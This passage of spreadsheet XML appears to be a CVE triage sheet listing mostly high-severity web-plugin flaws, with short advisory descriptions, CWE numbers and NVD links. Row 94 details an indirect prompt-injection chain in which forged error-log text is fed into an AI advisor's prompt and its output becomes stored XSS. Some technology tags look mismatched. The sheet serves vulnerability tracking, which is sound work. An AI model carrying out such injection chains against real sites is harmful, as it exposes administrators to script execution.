          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>express, gin</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>A system notification template on the Kiteworks appliance was rendered by a template engine that evaluated expressions contained in the stored template body. An authenticated System Administrator could potentially store a crafted template that executed operating-system commands on the appliance when the notification was next sent.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102142</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102392</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Extra Product Options For WooCommerce | Custom Product Addons and Fields &lt;= 3.3.8 versions.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102392</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103441</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data vulnerability in The Wikimedia Foundation MediaWiki Wikibase extension allows Leverage Executable Code in Non-Executable Files.
This issue affects MediaWiki Wikibase extension: 1.46, 1.45, and 1.43.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103441</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79625</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>Affected products do not properly synchronize access to their monitoring functionality. When multiple clients send concurrent requests, this may lead to incorrect reads or writes, or to corruption of internal memory structures. An authenticated remote attacker with monitoring access can exploit this issue to cause incorrect data processing or a denial-of-service condition.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79625</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85679</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>The Extendify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'styles.blocks' Block Type Key in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because registerIncoming() is hooked on rest_request_before_callbacks and runs before WordPress evaluates the route's permission_callback, meaning any unauthenticated POST, PUT, or PATCH request to a /wp/v2/global-styles route can trigger the vulnerable code path.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85679</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93624</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Music Player for WooCommerce &lt;= 1.9.1 versions.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93624</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93651</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>Author PHP Object Injection in Minimum and Maximum Quantity for WooCommerce &lt;= 2.1.2 versions.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93651</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93771</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Cost of Goods for WooCommerce &lt;= 3.5.2 versions.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93771</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94122</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Responsive Slider Gallery  &lt;= 1.5.5 versions.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94122</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94677</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Kadence WooCommerce Email Designer &lt;= 1.5.19.1 versions.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94677</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96343</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Custom role PHP Object Injection in WP ERP &lt;= 1.17.9 versions.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96343</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96344</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>Custom role PHP Object Injection in eCommerce Product Catalog &lt;= 3.6.0 versions.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96344</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96561</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>The AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.8.0 This is due to a chain of missing input neutralization and output escaping across the /mwai-ui/v1/chats/submit REST endpoint, the PHP error-log parser (MeowKit_MWAI_Helpers::php_error_logs), the Advisor task (Meow_MWAI_Modules_Advisor::run_advisor), and the Advisor dashboard widget (advisor_metabox): the server-parameter denylist in chat_submit strips only exact key names such as 'model' while convert_keys() later canonicalizes 'model_' back to 'model', allowing an unauthenticated caller to place an attacker-controlled string (including CR/LF) into $query-&gt;model; final_checks() throws an Exception whose message embeds that raw string, and the non-streaming, non-admin catch branch writes it to the PHP error log unmodified — creating a forged log line that the plugin's own parser subsequently returns as recent PHP-error content; run_advisor() then appends that content verbatim to the AI prompt (indirect prompt injection — CWE-1427), the returned JSON is stored in the mwai_advisor_data option with no schema validation or HTML sanitization, and advisor_metabox() concatenates the resulting 'title' and 'description' values directly into the WordPress dashboard widget without esc_html(), wp_kses(), or equivalent escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the WordPress dashboard.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96561</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96815</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>vite</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>Custom role Privilege Escalation in Vitepos &lt;= 3.5.0 versions.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96815</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96832</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Shop manager PHP Object Injection in Content Egg &lt;= 6.3.1 versions.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96832</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96833</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Editor PHP Object Injection in Ultimate Addons for Contact Form 7 &lt;= 3.5.51 versions.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96833</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97256</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
